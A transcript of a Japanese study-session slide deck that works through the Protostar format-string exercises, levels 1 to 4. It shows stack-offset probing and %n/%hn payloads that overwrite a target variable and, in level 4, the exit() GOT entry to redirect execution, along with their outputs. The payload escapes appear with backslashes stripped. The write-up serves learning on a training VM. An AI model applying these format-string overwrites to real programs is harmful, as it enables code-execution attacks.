Download to read offline
![Protostar format 1
• argv[1] を色々変えてあげればいいっぽい
• どのへんまでpopすると出てくるか探す
• int だから4byte
• AAAA%x....
• 手でやっても見つからない…
Monday, January 28, 13](https://image.slidesharecdn.com/tachikoma-2013-01-130128085204-phpapp02/85/Tachikoma-2013-01-10-320.jpg)
![Protostar format 4
• helloのアドレス
• # objdump -d ./format4 | grep hello [/opt/protostar/bin]
• 080484b4 <hello>:
Monday, January 28, 13](https://image.slidesharecdn.com/tachikoma-2013-01-130128085204-phpapp02/85/Tachikoma-2013-01-33-320.jpg)
![Protostar format 4
• 0x08049724をhello()に書き換えればいいから…
• python -c 'print
"x24x97x04x08x25x97x04x08x27x97x04x08" + "x"*168 +
"%4$hn" + "x"*976 + "%5$hn" + "x"*132 + "%6$hn"' | ./format4
• [1] 4950 done python -c |
• 4951 segmentation fault ./format4
• もしかして:入力長すぎ
Monday, January 28, 13](https://image.slidesharecdn.com/tachikoma-2013-01-130128085204-phpapp02/85/Tachikoma-2013-01-39-320.jpg)
Uploaded byRyota Hanyu
Tachikoma 2013-01
This document contains the notes from a session exploring different Protostar format string vulnerability exercises. It summarizes the steps taken to exploit each level by overwriting memory addresses or the GOT table to modify program behavior. For level 3, it took trying multiple payloads before discovering you need to target each byte of the memory address separately due to it being multibyte.
Tachikoma 2013-01
- 1.
- 2. おしながき • Fusion lv.02, 03, 04 • 5 minutes python Monday, January 28, 13
- 3.
- 4.
- 5. おしながき • Fusion lv.02, 03, 04 • 5 minutes python Monday, January 28, 13
- 6. おしながき • Protostar format lv.01, 02, 03, 04 • 5 minutes python Monday, January 28, 13
- 7. おしながき • Protostar format lv.01, 02, 03, 04 • 多めにやるから許してください… • 5 minutes python • import “大学の課題” Monday, January 28, 13
- 8. Protostar format 1 Monday,January 28, 13
- 9. Protostar format 1 • int targetを書き換えればok • C言語だとグローバル変数は0で初期化 • 目標:なんでもいいから0以外にする Monday, January 28, 13
- 10. Protostar format 1 • argv[1] を色々変えてあげればいいっぽい • どのへんまでpopすると出てくるか探す • int だから4byte • AAAA%x.... • 手でやっても見つからない… Monday, January 28, 13
- 11. Protostar format 1 Monday,January 28, 13
- 12. Protostar format 1 • 132くらい? • printf(“AAAA%132%x”, <-と同じ); • ってなるっぽい? Monday, January 28, 13
- 13. Protostar format 1 • %nを使って適当に書き換えよう • ./format1 `python -c 'print "x38x96x04x08xx%132$n"'` • 8xxyou have modified the target :) Monday, January 28, 13
- 14. Protostar format 2 Monday,January 28, 13
- 15. Protostar format 2 • 変更点 • argvからじゃなくてstdin • targetを64にしないといけないらしい Monday, January 28, 13
- 16. Protostar format 2 • 1と同様にpopして探すよ • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format2 • AAAA200,b7fd8420,bffff564,41414141 • target is 0 :( • 今度は4つでいいみたい Monday, January 28, 13
- 17. Protostar format 2 • targetのアドレス • user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target • 080496e4 g O .bss 00000004 target • 1と同じ感じで試してみる • user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08%4$n"' | ./format2 • ? • target is 4 :( Monday, January 28, 13
- 18. Protostar format 2 • target=4になった! • %nは書き換わった文字数だよね! • 試してみる • user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08x%4$n"' | ./format2 • x • target is 5 :( Monday, January 28, 13
- 19. Protostar format 2 • もっかい試してみる • user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08xx%4$n"' | ./format2 • xx • target is 6 :( • 64-4=60 だし… • user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08"+ "x"*60 +"%4$n"' | ./format2 • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx • you have modified the target :) Monday, January 28, 13
- 20. Protostar format 3 Monday,January 28, 13
- 21. Protostar format 3 • 変更点 • 直にprintf()じゃなくてprintbuffer(char *)をカマせてる • たくさん書き換えないといけない Monday, January 28, 13
- 22. Protostar format 3 • とりあえず同じようにしてみる • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format3 • AAAAxx0,bffff520,b7fd7ff4,0 • target is 00000000 :( Monday, January 28, 13
- 23. Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :( Monday, January 28, 13
- 24. Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :( Monday, January 28, 13
- 25. Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :( • 12個目でした Monday, January 28, 13
- 26. Protostar format 3 • targetのアドレス • user@protostar:/opt/protostar/bin$ objdump -t ./format3 | grep target • 080496f4 g O .bss 00000004 target Monday, January 28, 13
- 27. Protostar format 3 • 試してみる • python -c 'print "xf4x96x04x08" + "x"*256 + "%12$n"' | ./format3 • xxxxxxxxxxxxxxxxxxxxx(ry • target is 00000104 :( • 動かない Monday, January 28, 13
- 28. Protostar format 3 • マルチバイトや! • 各バイトごとに同じように計算してあげれば! Monday, January 28, 13
- 29. • 試してみる • python -c 'print "xf4x96x04x08xf5x96x04x08xf6x96x04x08%12$n %13$n%14$n"' | ./format3 • ? • target is 000c0c0c :( Monday, January 28, 13
- 30. • 色々足してみる • python -c 'print "xf4x96x04x08xf5x96x04x08xf6x96x04x08" + "x"*56 + "%12$n" + "x"*17 + "%13$n" + "x"*173 + "%14$n"' | ./format3 • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxx(ry • you have modified the target :) Monday, January 28, 13
- 31. Protostar format 4 Monday,January 28, 13
- 32. Protostar format 4 • 変更点 • targetじゃなくてGOTを書き換える • 目標 • call hello() Monday, January 28, 13
- 33. Protostar format 4 • helloのアドレス • # objdump -d ./format4 | grep hello [/opt/protostar/bin] • 080484b4 <hello>: Monday, January 28, 13
- 34. Protostar format 4 • pop, pop, pop... • python -c "print 'AAAA' + ',%x'*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141 Monday, January 28, 13
- 35. Protostar format 4 • pop, pop, pop... • python -c "print 'AAAA' + ',%x'*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141 Monday, January 28, 13
- 36. Protostar format 4 • pop, pop, pop... • python -c "print 'AAAA' + ',%x'*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141 • 4番目でした Monday, January 28, 13
- 37. Protostar format 4 • 方向性 • exit()を呼ぼうとしたら、hello()が呼ばれるようにしよう Monday, January 28, 13
- 38. Protostar format 4 • objdump -R ./format4 |grep exit • 08049718 R_386_JUMP_SLOT _exit • 08049724 R_386_JUMP_SLOT exit Monday, January 28, 13
- 39. Protostar format 4 • 0x08049724をhello()に書き換えればいいから… • python -c 'print "x24x97x04x08x25x97x04x08x27x97x04x08" + "x"*168 + "%4$hn" + "x"*976 + "%5$hn" + "x"*132 + "%6$hn"' | ./format4 • [1] 4950 done python -c | • 4951 segmentation fault ./format4 • もしかして:入力長すぎ Monday, January 28, 13
- 40. Protostar format 4 • Google(“help me”); • %nd(nは任意の整数)ってやると0埋めできるでしょ • 普通はnbyte埋めたいときはこうやるらしい… Monday, January 28, 13
- 41. Protostar format 4 • もう一回試す • python -c 'print "x24x97x04x08x25x97x04x08x27x97x04x08" + "x"*168 + "%4$hn%976d%5$hn" + "x"*132 + "%6$hn"' | ./format4 • $ %'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxx(ry • code execution redirected! you win Monday, January 28, 13
- 42. Protostar format 4 • なんか動いた。 Monday, January 28, 13